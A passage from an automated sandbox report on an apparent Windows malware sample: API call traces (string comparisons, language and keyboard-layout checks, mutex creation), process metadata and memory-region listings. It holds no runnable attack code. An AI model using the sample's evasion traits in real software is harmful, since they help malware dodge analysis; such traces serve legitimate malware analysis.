lpString2="GetEnlistmentId") returned 1 [0130.721] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0130.721] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0130.721] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0130.721] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0130.721] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0130.721] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0130.722] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0130.722] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0130.722] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0130.722] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0130.722] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0130.722] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0130.722] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0131.098] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0131.098] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0131.098] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0131.098] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0131.098] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0131.098] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0131.099] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0131.099] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0131.099] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0131.099] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0131.099] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0131.099] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0131.099] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0131.099] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0131.099] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0131.099] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0131.099] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0131.099] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0131.099] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0131.099] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0131.099] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0131.099] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0131.099] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0131.099] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0131.099] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0131.099] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0131.099] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0131.099] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0131.099] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0131.100] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0131.100] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0131.100] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0131.100] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0131.100] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0131.100] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0131.100] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0131.100] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0131.100] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0131.100] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0131.100] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0131.100] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0131.100] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0131.100] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0131.100] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0131.100] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0131.100] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0131.100] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0131.100] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0131.100] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0131.100] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0131.100] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0131.100] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0131.100] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0131.100] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0131.100] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0131.100] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0131.101] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0131.101] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0131.101] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0131.101] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0131.101] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0131.101] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0131.101] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0131.101] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0131.101] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0131.101] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0131.101] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0131.101] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0131.101] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0131.101] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0131.101] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0131.101] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0131.101] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0131.101] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0131.101] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0131.101] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0131.101] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0131.101] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0131.101] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0131.101] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0131.101] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0131.101] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0131.101] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0131.101] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0131.102] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0131.102] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0131.103] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0131.103] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0131.103] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0131.103] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0131.103] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0131.103] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0131.103] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0131.103] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0131.103] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0131.103] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0131.103] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0131.103] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0131.103] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0131.103] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0131.104] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0131.104] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0131.104] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0131.104] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0131.104] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0131.104] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0131.104] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0131.104] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0131.104] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0131.104] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0131.104] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0131.104] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0131.104] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0131.104] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0131.104] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0131.104] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0131.104] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0131.104] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0131.104] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0131.104] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0131.104] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0131.104] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0131.104] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0131.104] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0131.104] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0131.104] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0131.104] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0131.104] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0131.105] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0131.105] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0131.105] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0131.105] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0131.105] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0131.105] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0131.105] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0131.105] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0131.105] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0131.105] GetProcessHeap () returned 0x590000 [0131.105] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d05030 | out: hHeap=0x590000) returned 1 [0131.110] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0131.110] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0131.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1000) returned 0x2d05030 [0131.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xe) returned 0x5a9100 [0131.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="StartW", cchWideChar=-1, lpMultiByteStr=0x5a9100, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StartW", lpUsedDefaultChar=0x0) returned 7 [0131.111] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="\x10У\x03") returned 0x0 [0131.111] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="StartW") returned 0x7ffc45e91430 [0131.111] GetActiveWindow () returned 0x0 [0131.115] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetSystemDefaultLangID") returned 0x7ffc5ecf8d90 [0131.115] GetSystemDefaultLangID () returned 0x409 [0131.115] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="GetKeyboardLayoutList") returned 0x7ffc5e9929a0 [0131.115] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0131.116] GetProcessHeap () returned 0x590000 [0131.116] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8) returned 0x593ca0 [0131.116] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="GetKeyboardLayoutList") returned 0x7ffc5e9929a0 [0131.116] GetKeyboardLayoutList (in: nBuff=1, lpList=0x593ca0 | out: lpList=0x593ca0) returned 1 [0131.116] GetProcessHeap () returned 0x590000 [0131.116] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x593ca0 | out: hHeap=0x590000) returned 1 [0131.116] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateMutexA") returned 0x7ffc5ecfd6e0 [0131.116] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{a4f25aea-0e06-40f9-81b2-53370f3faa31}") returned 0x17c [0131.117] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetLastError") returned 0x7ffc5eceb710 [0131.117] GetLastError () returned 0x0 [0131.117] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0131.117] CloseHandle (hObject=0x17c) returned 1 [0131.117] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateMutexA") returned 0x7ffc5ecfd6e0 [0131.117] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{4b03c46d-9a60-4fba-bdeb-7fc0f42c98fa}") returned 0x17c [0131.117] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetLastError") returned 0x7ffc5eceb710 [0131.117] GetLastError () returned 0xb7 [0131.117] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0131.117] CloseHandle (hObject=0x17c) returned 1 [0131.118] ExitProcess (uExitCode=0x1) [0131.118] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x59c2c0 | out: hHeap=0x590000) returned 1 [0131.119] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a5af0 | out: hHeap=0x590000) returned 1 [0131.121] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0131.121] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0131.121] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0131.121] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0131.121] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0131.121] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0131.122] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a70d0 | out: hHeap=0x590000) returned 1 [0131.122] RtlInterlockedFlushSList (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) returned 0x0 [0131.122] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0131.122] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 Thread: id = 29 os_tid = 0x780 Process: id = "9" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x212c8000" os_pid = "0x1288" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StopServer" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1180 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1181 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1182 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1183 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 1184 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 1185 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1186 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1187 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1188 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 1189 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 1190 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1191 start_va = 0x460000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1192 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1193 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1194 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1195 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 1196 start_va = 0x560000 end_va = 0x61dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1197 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1198 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1199 start_va = 0x620000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 1200 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1202 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1203 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1204 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1205 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1206 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1207 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1208 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1209 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 